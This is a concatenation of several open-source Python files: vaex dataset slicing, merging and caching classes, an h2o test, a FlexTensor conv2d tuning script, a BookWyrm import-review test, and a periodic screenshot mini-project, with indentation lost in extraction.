self._ids = frozendict(hashes)
def _encode(self, encoding, skip=set()):
dataset_spec = encoding.encode('dataset', self.original)
spec = {'dataset': dataset_spec}
if self.state is not None and self.selection is not None:
spec['state'] = encoding.encode('dataframe-state', self.state)
spec['selection'] = encoding.encode('selection', self.selection)
spec['filter_array'] = encoding.encode('array', self._filter)
return spec
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
if 'filter_array' in spec:
filter = encoding.decode('array', spec['filter_array'])
ds = cls(dataset, filter)
else:
state = encoding.decode('dataframe-state', spec['state'])
selection = encoding.decode('selection', spec['selection'])
df = vaex.from_dataset(dataset)
df.state_set(state)
df.set_selection(vaex.dataframe.FILTER_SELECTION_NAME, selection)
df._push_down_filter()
filter = df.dataset.filter
ds = cls(dataset, filter, state=state, selection=selection)
return ds
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
chunk_size = chunk_size or 1024**2
if not columns:
end = self.row_count
length = end
i1 = i2 = 0
i2 = min(length, i1 + chunk_size)
while i1 < length:
yield i1, i2, {}
i1 = i2
i2 = min(length, i1 + chunk_size)
return
def filtered_chunks():
for i1, i2, chunks in self.original.chunk_iterator(columns, chunk_size=chunk_size, reverse=reverse):
chunks_filtered = {name: vaex.array_types.filter(ar, self._filter[i1:i2]) for name, ar in chunks.items()}
yield chunks_filtered
yield from _rechunk(filtered_chunks(), chunk_size)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self._filter)
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
expected_length = end - start
mask = vaex.superutils.Mask(memoryview(self._filter))
start, end = mask.indices(start, end-1)
end += 1
filter = self._filter[start:end]
assert filter.sum() == expected_length
return type(self)(self.original.slice(start, end), filter)
@register
class DatasetSliced(DatasetDecorator):
snake_name = "slice"
def __init__(self, original, start, end):
super().__init__(original)
self.start = start
self.end = end
self._row_count = end - start
self._create_columns()
# self._ids = {}
self._ids = frozendict({name: hash_slice(hash, start, end) for name, hash in original._ids.items()})
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self.start, self.end)
return f'dataset-{self.snake_name}-{id}'
def leafs(self) -> List[Dataset]:
# we don't want to propagate slicing
return [self]
def _encode(self, encoding, skip=set()):
dataset_spec = encoding.encode('dataset', self.original)
return {'dataset': dataset_spec, 'start': self.start, 'end': self.end}
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
return cls(dataset, spec['start'], spec['end'])
def _create_columns(self):
self._columns = {name: vaex.dataset.ColumnProxy(self, name, data_type(col)) for name, col in self.original._columns.items()}
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
yield from self.original.chunk_iterator(columns, chunk_size=chunk_size, reverse=reverse, start=self.start, end=self.end)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.start, self.end)
def slice(self, start, end):
length = end - start
start += self.start
end = start + length
if end > self.original.row_count:
raise IndexError(f'Slice end ({end}) if larger than number of rows: {self.original.row_count}')
return type(self)(self.original, start, end)
@register
class DatasetSlicedArrays(DatasetDecorator):
snake_name = 'slice_arrays'
def __init__(self, original, start, end):
super().__init__(original)
# maybe we want to avoid slicing twice, and collapse it to 1?
self.start = start
self.end = end
# TODO: this is the old dataframe.trim method, we somehow need to test/capture that
# if isinstance(column, array_types.supported_array_types): # real array
# df.columns[name] = column[self._index_start:self._index_end]
# else:
# df.columns[name] = column.trim(self._index_start, self._index_end)
self._create_columns()
self._ids = frozendict({name: hash_slice(hash, start, end) for name, hash in original._ids.items()})
self._set_row_count()
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self.start, self.end)
return f'dataset-{self.snake_name}-{id}'
def leafs(self) -> List[Dataset]:
# we don't want to propagate slicing
return [self]
def _create_columns(self):
columns = {}
for name, column in self.original.items():
if isinstance(column, array_types.supported_array_types): # real array
column = column[self.start:self.end]
else:
column = column.trim(self.start, self.end)
columns[name] = column
self._columns = frozendict(columns)
def _encode(self, encoding, skip=set()):
dataset_spec = encoding.encode('dataset', self.original)
return {'dataset': dataset_spec, 'start': self.start, 'end': self.end}
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
return cls(dataset, spec['start'], spec['end'])
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
yield from self._default_chunk_iterator(self._columns, columns, chunk_size, reverse=reverse)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.start, self.end)
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
length = end - start
start += self.start
end = start + length
if end > self.original.row_count:
raise IndexError(f'Slice end ({end}) if larger than number of rows: {self.original.row_count}')
return type(self)(self.original, start, end)
@register
class DatasetDropped(DatasetDecorator):
snake_name = "drop"
def __init__(self, original, names):
super().__init__(original)
self._dropped_names = tuple(names)
self._create_columns()
self._ids = frozendict({name: ar for name, ar in original._ids.items() if name not in names})
self._set_row_count()
def dropped(self, *names):
return DatasetDropped(self.original, self._dropped_names + names)
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self._dropped_names)
return f'dataset-{self.snake_name}-{id}'
def _create_columns(self):
self._columns = frozendict({name: ar for name, ar in self.original.items() if name not in self._dropped_names})
def _encode(self, encoding):
dataset_spec = encoding.encode('dataset', self.original)
return {'dataset': dataset_spec, 'names': list(self._dropped_names)}
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
ds = cls(dataset, spec['names'])
return ds
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
for column in columns:
if column in self._dropped_names:
raise KeyError(f'Oops, you tried to get column {column} while it is actually dropped')
yield from self.original.chunk_iterator(columns, chunk_size=chunk_size, reverse=reverse)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self._dropped_names)
def close(self):
self.original.close()
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return type(self)(self.original.slice(start, end), self._dropped_names)
@register
class DatasetMerged(Dataset):
snake_name = "merge"
def __init__(self, left, right):
super().__init__()
self.left = left
self.right = right
if self.left.row_count != self.right.row_count:
raise ValueError(f'Merging datasets with unequal row counts ({self.left.row_count} != {self.right.row_count})')
self._row_count = self.left.row_count
overlap = set(left) & set(right)
if overlap:
raise NameError(f'Duplicate names: {overlap}')
self._create_columns()
self._ids = frozendict({**left._ids, **right._ids})
self._set_row_count()
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.left.fingerprint, self.right.fingerprint)
return f'dataset-{self.snake_name}-{id}'
def leafs(self) -> List[Dataset]:
return self.left.leafs() + self.right.leafs()
def _create_columns(self):
# TODO: for DatasetArray, we might want to just do this?
# self._columns = frozendict({**left._columns, **right._columns})
self._columns = {**{name: ColumnProxy(self.left, name, data_type(col)) for name, col in self.left._columns.items()},
**{name: ColumnProxy(self.right, name, data_type(col)) for name, col in self.right._columns.items()}}
def _encode(self, encoding, skip=set()):
dataset_spec_left = encoding.encode('dataset', self.left)
dataset_spec_right = encoding.encode('dataset', self.right)
spec = {'left': dataset_spec_left, 'right': dataset_spec_right}
return spec
@classmethod
def _decode(cls, encoding, spec):
left = encoding.decode('dataset', spec['left'])
right = encoding.decode('dataset', spec['right'])
ds = cls(left, right)
return ds
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
columns_left = [k for k in columns if k in self.left]
columns_right = [k for k in columns if k in self.right]
if not columns_left:
yield from self.right.chunk_iterator(columns, chunk_size, reverse=reverse)
elif not columns_right:
yield from self.left.chunk_iterator(columns, chunk_size, reverse=reverse)
else:
for (i1, i2, ichunks), (j1, j2, jchunks) in zip(
self.left.chunk_iterator(columns_left, chunk_size, reverse=reverse),
self.right.chunk_iterator(columns_right, chunk_size, reverse=reverse)):
# TODO: if one of the datasets does not respect the chunk_size (e.g. parquet)
# this might fail
assert i1 == j1
assert i2 == j2
yield i1, i2, {**ichunks, **jchunks}
def is_masked(self, column):
if column in self.left:
return self.left.is_masked(column)
else:
return self.right.is_masked(column)
def shape(self, column):
if column in self.left:
return self.left.shape(column)
else:
return self.right.shape(column)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.left.hashed(), self.right.hashed())
def close(self):
self.left.close()
self.right.close()
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return type(self)(self.left.slice(start, end), self.right.slice(start, end))
@register
class DatasetArrays(Dataset):
snake_name = "arrays"
def __init__(self, mapping=None, hashed=True, **kwargs):
super().__init__()
if mapping is None:
mapping = {}
columns = {**mapping, **kwargs}
columns = {key: to_supported_array(ar) for key, ar in columns.items()}
# TODO: we finally want to get rid of datasets with no columns
self._columns = frozendict(columns)
if hashed:
self._ids = frozendict({key: hash_array(array) for key, array in self._columns.items()})
else:
self._ids = frozendict()
self._set_row_count()
@property
def id(self):
try:
# requires hashing and is expensive
return self.fingerprint
except ValueError:
return f'dataset-{self.snake_name}-uuid4-{self._id}'
@property
def _fingerprint(self):
keys = set(self)
keys_hashed = set(self._ids)
missing = keys ^ keys_hashed
if missing:
# if we don't have hashes for all columns, we do it like id
return f'dataset-{self.snake_name}-uuid4-{self._id}'
# self.__hash__() # invoke just to check we don't have missing hashes
# but Python's hash functions are not deterministic (cross processs)
fp = vaex.cache.fingerprint(tuple(self._ids.items()))
return f'dataset-{self.snake_name}-hashed-{fp}'
def leafs(self) -> List[Dataset]:
return [self]
def _encode(self, encoding):
arrays = encoding.encode_dict('array', self._columns)
spec = {'dataset_type': self.snake_name, 'arrays': arrays}
if self._ids:
fingerprints = dict(self._ids)
spec['fingerprints'] = fingerprints
return spec
@classmethod
def _decode(cls, encoding, spec):
arrays = encoding.decode_dict('array', spec['arrays'])
ds = cls(arrays)
if 'fingerprints' in spec:
ds._ids = frozendict(spec['fingerprints'])
return ds
def __getstate__(self):
state = self.__dict__.copy()
# here, we actually DO want to keep the columns
# del state['_columns']
return state
def __setstate__(self, state):
super().__setstate__(state)
def _create_columns(self):
pass
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
yield from self._default_chunk_iterator(self._columns, columns, chunk_size, reverse=reverse)
def is_masked(self, column):
ar = self._columns[column]
if not isinstance(ar, np.ndarray):
ar = ar[0:1] # take a small piece
if isinstance(ar, np.ndarray):
return np.ma.isMaskedArray(ar)
else:
return False # an arrow array always has null value options
def shape(self, column):
ar = self._columns[column]
if not isinstance(ar, np.ndarray):
ar = ar[0:1] # take a small piece
if isinstance(ar, vaex.array_types.supported_arrow_array_types):
return tuple()
else:
return ar.shape[1:]
def merged(self, rhs):
# TODO: if we don't allow emtpy datasets, we can remove this method
if len(self) == 0:
return rhs
if len(rhs) == 0:
return self
# TODO: this is where we want to check if both are array like
# and have faster version of merged
return DatasetMerged(self, rhs)
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return DatasetSlicedArrays(self, start=start, end=end)
def hashed(self):
if set(self._ids) == set(self):
return self
new = type(self)(self._columns)
new._ids = frozendict({key: hash_array(array) for key, array in new._columns.items()})
return new
def close(self):
pass # nothing to do, maybe drop a refcount?
# TODO: we might want to really get rid of these, since we want to avoid copying them over the network?
# def dropped(self, names):
class DatasetFile(Dataset):
"""Datasets that map to a file can keep their ids/hashes in the file itself,
or keep them in a meta file.
"""
def __init__(self, path, write=False, fs_options={}, fs=None):
super().__init__()
self.path = path
self.fs_options = fs_options
self.fs = fs
self.write = write
self._columns = {}
self._ids = {}
self._frozen = False
self._hash_calculations = 0 # track it for testing purposes
self._hash_info = {}
self._hash_cache_needs_write = False
self._read_hashes()
@property
def name(self):
base, ext, fs_options = vaex.file.split_ext(self.path)
base = os.path.basename(base)
return base
@property
def _fingerprint(self):
if set(self._ids) == set(self):
fingerprint = vaex.cache.fingerprint(dict(self._ids))
return f'dataset-{self.snake_name}-hashed-{fingerprint}'
else:
# TODO: if the dataset is hashed, return a fingerprint based on that
fingerprint = vaex.file.fingerprint(self.path, fs_options=self.fs_options, fs=self.fs)
return f'dataset-{self.snake_name}-{fingerprint}'
def leafs(self) -> List[Dataset]:
return [self]
def _create_columns(self):
pass
@classmethod
def quick_test(cls, path, fs_options={}, fs=None, *args, **kwargs):
return False
@classmethod
def open(cls, path, *args, **kwargs):
return cls(path, *args, **kwargs)
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
yield from self._default_chunk_iterator(self._columns, columns, chunk_size, reverse=reverse)
def is_masked(self, column):
ar = self._columns[column]
if not isinstance(ar, np.ndarray):
ar = ar[0:1] # take a small piece
if isinstance(ar, np.ndarray):
return np.ma.isMaskedArray(ar)
else:
return False # an arrow array always has null value options
def shape(self, column):
ar = self._columns[column]
if not isinstance(ar, np.ndarray):
ar = ar[0:1] # take a small piece
if isinstance(ar, vaex.array_types.supported_arrow_array_types):
return tuple()
else:
return ar.shape[1:]
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return DatasetSlicedArrays(self, start=start, end=end)
def _read_hashes(self):
path_hashes = Path(self.path + '.d') / 'hashes.yaml'
try:
exists = path_hashes.exists()
except OSError: # happens for windows py<38
exists = False
if exists:
with path_hashes.open() as f:
hashes = vaex.utils.yaml_load(f)
if hashes is None:
raise ValueError(f'{path_hashes} was probably truncated due to another process writing.')
self._hash_info = hashes.get('columns', {})
def _freeze(self):
self._ids = frozendict(self._ids)
self._columns = frozendict(self._columns)
self._set_row_count()
self._frozen = True
if self._hash_cache_needs_write:
self._write_hash_info()
def encode(self, encoding, skip=set()):
spec = {'dataset_type': self.snake_name,
'write': self.write,
'path': self.path,
'fs_options': self.fs_options,
'fs': self.fs}
return spec
def __getstate__(self):
# we don't have the columns in the state, since we should be able
# to get them from disk again
return {
'write': self.write,
'path': self.path,
'fs_options': self.fs_options,
'fs': self.fs,
'_ids': dict(self._ids) # serialize the hases as non-frozen dict
}
def __setstate__(self, state):
super().__setstate__(state)
# 'ctor' like initialization
self._frozen = False
self._hash_calculations = 0
self._columns = {}
self._hash_info = {}
self._hash_cache_needs_write = False
self._read_hashes()
def add_column(self, name, data):
self._columns[name] = data
if self.write:
return # the columns don't include the final data
# the hashes will be done in .freeze()
hash_info = self._hash_info.get(name)
if hash_info:
hash_info_previous = hash_info.copy()
hash, hash_info = hash_array(data, hash_info, return_info=True)
if hash_info_previous != hash_info:
self._hash_cache_needs_write = True
self._ids[name] = hash
self._hash_info[name] = hash_info # always update the information
@property
def _local_hash_path(self):
# TODO: support s3 and gcs
# TODO: fallback directory when a user cannot write
if Path(self.path).exists():
directory = Path(self.path + '.d')
directory.mkdir(exist_ok=True)
else:
o = urlparse(self.path)
directory = Path(vaex.utils.get_private_dir('dataset', o.scheme, o.netloc, o.path[1:]))
return directory / 'hashes.yaml'
def hashed(self):
if set(self._ids) == set(self):
return self
cls = type(self)
# use pickle protocol to clone
new = cls.__new__(cls)
new.__setstate__(self.__getstate__())
hashes = {}
disk_cached_hashes = {}
for name, column in new.items():
hash_info = self._hash_info.get(name)
if hash_info is None:
logging.warning(f'Calculating hash for column {name} of length {len(column)} (1 time operation, will be cached on disk)')
hash_info = hash_array_data(column)
hash, hash_info = hash_array(column, hash_info, return_info=True)
new._hash_calculations += 1
hashes[name] = hash
disk_cached_hashes[name] = hash_info
new._ids = frozendict(hashes)
new._hash_info = frozendict(disk_cached_hashes)
path_hashes = new._local_hash_path
# TODO: without this check, if multiple processes are writing (e.g. tests/execution_test.py::test_task_sum with ray)
# this leads to a race condition, where we write the file, and while truncated, _read_hases() fails (because the file exists)
# if new._hash_info != new._ids:
new._write_hash_info()
return new
def _write_hash_info(self):
if self._hash_info: # TODO: file lock
path_hashes = self._local_hash_path
with path_hashes.open('w') as f:
vaex.utils.yaml_dump(f, {'columns': dict(self._hash_info)})
class DatasetCached(DatasetDecorator):
snake_name = "cached"
shared_cache = {}
def __init__(self, original, names, cache=None, to_numpy=False):
super(DatasetCached, self).__init__(original)
self.original = original
self.names = names
self._shared = cache is None or cache is self.shared_cache
self.cache = cache if cache is not None else self.shared_cache
self.to_numpy = to_numpy
self._create_columns()
self._row_count = self.original.row_count
@property
def _fingerprint(self):
return self.original.fingerprint
def _create_columns(self):
columns = {}
schema = self.original.schema()
for name, column in self.original.items():
columns[name] = ColumnProxy(self, name, schema[name])
self._columns = frozendict(columns)
self._ids = frozendict(self.original._ids)
def _encode(self, encoding, skip=set()):
raise NotImplementedError("cannot serialize cache")
@classmethod
def _decode(cls, encoding, spec):
raise NotImplementedError("cannot serialize cache")
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
chunk_size = chunk_size or chunk_size_default
columns_all = set(columns)
columns_cachable = columns_all & set(self.names)
# avoids asking the cache twice, by using .get() and then testing for None
columns_cached = {name: self.cache.get(self._cache_key(name)) for name in columns_cachable}
columns_cached = {name: array for name, array in columns_cached.items() if array is not None}
columns_to_cache = columns_cachable - set(columns_cached)
column_required = columns_all - set(columns_cached)
cache_chunks = {name: [] for name in columns_to_cache}
def cached_iterator():
chunks_list = [chunks for name, chunks in columns_cached.items()]
# chunks_list is of form [[ar1x, ar2x, a3x], [ar1y, ar2y, a3y]]
# and now we want to yield
# * i1, i2 {'x': ar1x, 'y': ar1y}
# * i1, i2 {'x': ar2x, 'y': ar2y}
# * i1, i2 {'x': ar3x, 'y': ar3y}
names = [name for name, chunks in columns_cached.items()]
i1 = 0
i2 = 0
for chunks in zip(*chunks_list):
i2 += len(chunks[0])
for chunk in chunks:
assert len(chunk) == len(chunks[0])
yield i1, i2, dict(zip(names, chunks))
i1 = i2
if columns_cached:
cached_iter = chunk_rechunk(cached_iterator(), chunk_size)
else:
cached_iter = empty_chunk_iterator(0, self.row_count, chunk_size)
if column_required:
original_iter = self.original.chunk_iterator(column_required, chunk_size, reverse=reverse)
else:
original_iter = empty_chunk_iterator(0, self.row_count, chunk_size)
original_iter = list(original_iter)
cached_iter = list(cached_iter)
for (o1, o2, ochunks), (c1, c2, cchunks) in zip(original_iter, cached_iter):
assert o1 == c1
assert o2 == c2
yield o1, o2, {**ochunks, **cchunks}
for name in columns_to_cache:
if self.to_numpy:
ochunks = {k: vaex.array_types.to_numpy(v) for k, v in ochunks.items()}
cache_chunks[name].append(ochunks[name])
# we write it too the cache in 1 go
for name in columns_to_cache:
self.cache[self._cache_key(name)] = cache_chunks[name]
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return type(self)(self.original.slice(start, end), self.names, cache=self.cache)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.names, cache=self.cache)
def _cache_key(self, name):
return f"{self.fingerprint}-{name}"
|
h2o-py/tests/testdir_jira/pyunit_pubdev_6603.py
|
ahmedengu/h2o-3
| 6,098 |
76127
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.path.insert(1,"../../")
from tests import pyunit_utils
import h2o
import pandas as pd
def pubdev_6603():
hf = h2o.H2OFrame(pd.DataFrame([{'a': 1, 'b': 2}, {'a': 3, 'b': 4}]))
s1, s2 = hf.split_frame(ratios=[0.5], seed=1)
h2o.remove([hf, s1, s2])
assert len(h2o.ls()) == 0
if __name__ == "__main__":
pyunit_utils.standalone_test(pubdev_6603)
else:
pubdev_6603()
|
flextensor/optimize/optimize_gemm_conv2d.py
|
imxian/FlexTensor
| 135 |
76137
|
<reponame>imxian/FlexTensor<filename>flextensor/optimize/optimize_gemm_conv2d.py
import os
import sys
import argparse
import time
import json
import tvm
import torch
from flextensor.utils import Config
from flextensor.task import Task, TASK_TABLE
from flextensor.scheduler import schedule, schedule_with_config
from flextensor.measure import _evaluate
from flextensor.configs.conv2d_config import *
shape_dict = {
"yolo": yolo_shapes,
"google": google_shapes,
"squeeze": squeeze_shapes,
"res": res_shapes,
"vgg-16": vgg_16_shapes,
"vgg-19": vgg_19_shapes
}
def optimize(prefix, from_, shapes, target="llvm", dev_id=0, trials=100, timeout=4.0, parallel=1, method="searching", use_model=False, logfile=sys.stdout):
ret = dict()
for i, shape in enumerate(shapes):
print("Optimize {} convolution layer {} shape {}".format(prefix, i + 1 + from_, shape), flush=True)
batch, in_channel, height, width, out_channel, _, k_h, k_w, _, stride, padding, _, _ = shape
# create an empty task but has the correct key we want
task = Task(
"gemm_conv2d",
prefix + str(i + from_),
None,
(batch, in_channel, height, width, out_channel, k_h, stride, padding, 1, 1),
target,
dev_id
)
beg = time.time()
s, bufs, configs = schedule(
task.key,
op_trial=trials,
timeout=timeout,
op_stop=30,
parallel=parallel,
method=method,
use_model=use_model,
trials=[trials//10, trials//5, trials, trials//5]
)
end = time.time()
# print(tvm.lower(s, bufs, simple_mode=True))
print("######################################")
print("op schedules:")
for config in configs.op_config_lst:
print("----------------------------------")
for name, value in config.items():
if value:
print(name, value)
print("######################################")
print("graph schedules:")
for name, value in configs.graph_config.items():
if value:
print(name, value)
ret[task.key] = configs
string = json.dumps(configs)
line = task.key + ":" + string
print(line, file=logfile, flush=True)
s, bufs = schedule_with_config(task.key, configs)
time_cost = _evaluate(s, bufs, target, task.dev_id, 10)
print("######################################")
print("Use", time_cost, "ms")
print("Cost", end - beg, "s")
print()
return ret
def test(task_key, configs, dev_id=None):
task = TASK_TABLE[task_key]
s, bufs = schedule_with_config(task_key, configs)
dev_id = dev_id if dev_id is not None else task.dev_id
time_cost = _evaluate(s, bufs, task.target, dev_id, 10)
print(task_key, "use", time_cost, "ms")
print()
def schedule_with_config_local():
with open("/home/retina/skw/work/AutoScheduler/gemm_conv.log", 'r') as f:
"""
(1, 3, 448, 448, 64, 3, 7, 7, 1, 2, 3, 1, 1)
Conv 2d on cpu: 0.011640000343322753s
Conv 2d on cuda: 0.006447720527648926s
(1, 64, 112, 112, 192, 64, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.010520696640014648s
Conv 2d on cuda: 0.006895184516906738s
(1, 192, 56, 56, 128, 192, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.00572810173034668s
Conv 2d on cuda: 0.005124855041503906s
(1, 128, 56, 56, 256, 128, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.005372405052185059s
Conv 2d on cuda: 0.003541111946105957s
(1, 256, 56, 56, 256, 256, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.00752255916595459s
Conv 2d on cuda: 0.0071736335754394535s
(1, 256, 56, 56, 512, 256, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.014762544631958007s
Conv 2d on cuda: 0.006854510307312012s
(1, 512, 28, 28, 256, 512, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.0043433189392089845s
Conv 2d on cuda: 0.0035385370254516603s
(1, 256, 28, 28, 512, 256, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.005109810829162597s
Conv 2d on cuda: 0.0018965244293212891s
(1, 512, 28, 28, 512, 512, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.004613542556762695s
Conv 2d on cuda: 0.003508114814758301s
(1, 512, 28, 28, 1024, 512, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.015011453628540039s
Conv 2d on cuda: 0.0038038253784179687s
(1, 1024, 14, 14, 512, 1024, 1, 1, 1, 1, 0, 1, 1)
Conv 2d on cpu: 0.003091883659362793s
Conv 2d on cuda: 0.001864314079284668s
(1, 512, 14, 14, 1024, 512, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.007311129570007324s
Conv 2d on cuda: 0.0012821674346923829s
(1, 1024, 14, 14, 1024, 1024, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.020050597190856934s
Conv 2d on cuda: 0.0026390790939331056s
(1, 1024, 14, 14, 1024, 1024, 3, 3, 1, 2, 1, 1, 1)
Conv 2d on cpu: 0.0181943416595459s
Conv 2d on cuda: 0.002562427520751953s
(1, 1024, 7, 7, 1024, 1024, 3, 3, 1, 1, 1, 1, 1)
Conv 2d on cpu: 0.018287014961242676s
Conv 2d on cuda: 0.0017349958419799806s
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--shapes", help="Use which shapes [yolo, google, res, squeeze, vgg-16, vgg-19]", type=str, default="")
parser.add_argument("-f", "--from_", help="From which shape", type=int, default=0)
parser.add_argument("-t", "--to", help="To which shape", type=int, default=-1)
parser.add_argument("-l", "--log", help="Log file name", type=str, default="")
parser.add_argument("--test", help="test file name", type=str, default="")
parser.add_argument("--trials", help="number of trials for op", type=int, default=100)
parser.add_argument("--target", help="target device type", type=str, default="llvm")
parser.add_argument("--device", help="target device number", type=int, default=0)
parser.add_argument("--timeout", help="timeout", type=float, default=4.0)
parser.add_argument("--parallel", help="parallel", type=int, default=1)
parser.add_argument("--use_model", help="use performance model", action="store_true")
parser.add_argument("--method", help="how to schedule", type=str, default="searching")
parser.add_argument("--test_torch", help="whether to test torch implementation", type=bool, default=False)
args = parser.parse_args()
if args.shapes != "":
shapes = shape_dict[args.shapes]
if args.to < 0:
end = len(shapes)
else:
end = args.to
if args.log != "":
with open(args.log, "a") as flog:
ret = optimize(
args.shapes, args.from_,
shapes[args.from_:end],
target=args.target,
dev_id=args.device,
timeout=args.timeout,
trials=args.trials,
parallel=args.parallel,
method=args.method,
use_model=args.use_model,
logfile=flog
)
else:
ret = optimize(
args.shapes,
args.from_,
shapes[args.from_:end],
target=args.target,
dev_id=args.device,
timeout=args.timeout,
trials=args.trials,
parallel=args.parallel,
method=args.method,
use_model=args.use_model,
logfile=sys.stdout
)
if args.test != "":
with open(args.test, "r") as fin:
for line in fin:
name, string = line.split(":", 1)
obj = json.loads(string)
configs = Config(obj[0], obj[1])
test(name, configs, dev_id=args.device)
if args.test_torch:
assert args.shapes != ""
shapes = shape_dict[args.shapes]
""" Warm up """
batch, in_channel, height, width, out_channel, _, k_h, k_w, _, stride, padding, dilation, groups = shapes[0]
conv2d = torch.nn.Conv2d(in_channel, out_channel, (k_h, k_w), stride=stride, padding=padding, dilation=dilation, groups=groups).cuda()
img = torch.rand((batch, in_channel, height, width)).cuda()
res = conv2d(img)
for shape in shapes:
print(shape)
batch, in_channel, height, width, out_channel, _, k_h, k_w, _, stride, padding, dilation, groups = shape
start_time = time.time()
conv2d = torch.nn.Conv2d(in_channel, out_channel, (k_h, k_w), stride=stride, padding=padding, dilation=dilation, groups=groups)
for i in range(args.trials):
img = torch.rand((batch, in_channel, height, width))
res = conv2d(img)
cpu_time = time.time() - start_time
print("Conv 2d on cpu: {}s".format(cpu_time / args.trials))
start_time = time.time()
conv2d = conv2d.cuda()
for i in range(args.trials):
img = torch.rand((batch, in_channel, height, width)).cuda()
res = conv2d(img)
cuda_time = time.time() - start_time
print("Conv 2d on cuda: {}s".format(cuda_time / args.trials))
|
bookwyrm/tests/views/imports/test_import_review.py
|
mouse-reeve/fedireads
| 270 |
76140
|
<reponame>mouse-reeve/fedireads
""" test for app action functionality """
from unittest.mock import patch
from django.template.response import TemplateResponse
from django.test import TestCase
from django.test.client import RequestFactory
from bookwyrm.tests.validate_html import validate_html
from bookwyrm import models, views
class ImportManualReviewViews(TestCase):
"""goodreads import views"""
def setUp(self):
"""we need basic test data and mocks"""
self.factory = RequestFactory()
with patch("bookwyrm.suggested_users.rerank_suggestions_task.delay"), patch(
"bookwyrm.activitystreams.populate_stream_task.delay"
), patch("bookwyrm.lists_stream.populate_lists_task.delay"):
self.local_user = models.User.objects.create_user(
"<EMAIL>",
"<EMAIL>",
"password",
local=True,
localname="mouse",
)
models.SiteSettings.objects.create()
self.job = models.ImportJob.objects.create(user=self.local_user, mappings={})
work = models.Work.objects.create(title="Test Work")
self.book = models.Edition.objects.create(
title="Example Edition",
remote_id="https://example.com/book/1",
parent_work=work,
)
def test_import_troubleshoot_get(self):
"""there are so many views, this just makes sure it LOADS"""
view = views.ImportManualReview.as_view()
request = self.factory.get("")
request.user = self.local_user
with patch("bookwyrm.tasks.app.AsyncResult") as async_result:
async_result.return_value = []
result = view(request, self.job.id)
self.assertIsInstance(result, TemplateResponse)
validate_html(result.render())
self.assertEqual(result.status_code, 200)
def test_approve_item(self):
"""a guess is correct"""
import_item = models.ImportItem.objects.create(
index=0,
job=self.job,
book_guess=self.book,
fail_reason="no match",
data={},
normalized_data={},
)
request = self.factory.post("")
request.user = self.local_user
with patch("bookwyrm.importers.importer.import_item_task.delay") as mock:
views.approve_import_item(request, self.job.id, import_item.id)
self.assertEqual(mock.call_count, 1)
import_item.refresh_from_db()
self.assertIsNone(import_item.fail_reason)
self.assertIsNone(import_item.book_guess)
self.assertEqual(import_item.book.id, self.book.id)
def test_delete_item(self):
"""a guess is correct"""
import_item = models.ImportItem.objects.create(
index=0,
job=self.job,
book_guess=self.book,
fail_reason="no match",
data={},
normalized_data={},
)
request = self.factory.post("")
request.user = self.local_user
views.delete_import_item(request, self.job.id, import_item.id)
import_item.refresh_from_db()
self.assertEqual(import_item.fail_reason, "no match")
self.assertIsNone(import_item.book_guess)
self.assertIsNone(import_item.book)
|
projects/capture_screenshot/screenshot.py
|
rossi2018/python-mini-projects
| 9,957 |
76142
|
import os
import argparse
import pyautogui
import time
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--path", help="absolute path to store screenshot.", default=r"./images")
parser.add_argument("-t", "--type", help="h (in hour) or m (in minutes) or s (in seconds)", default='h')
parser.add_argument("-f", "--frequency", help="frequency for taking screenshot per h/m/s.", default=1, type=int)
args = parser.parse_args()
sec = 0.
if args.type == 'h':
sec = 60 * 60 / args.frequency
elif args.type == 'm':
sec = 60 / args.frequency
if sec < 1.:
sec = 1.
if os.path.isdir(args.path) != True:
os.mkdir(args.path)
try:
while True:
t = time.localtime()
current_time = time.strftime("%H_%M_%S", t)
file = current_time + ".jpg"
image = pyautogui.screenshot(os.path.join(args.path,file))
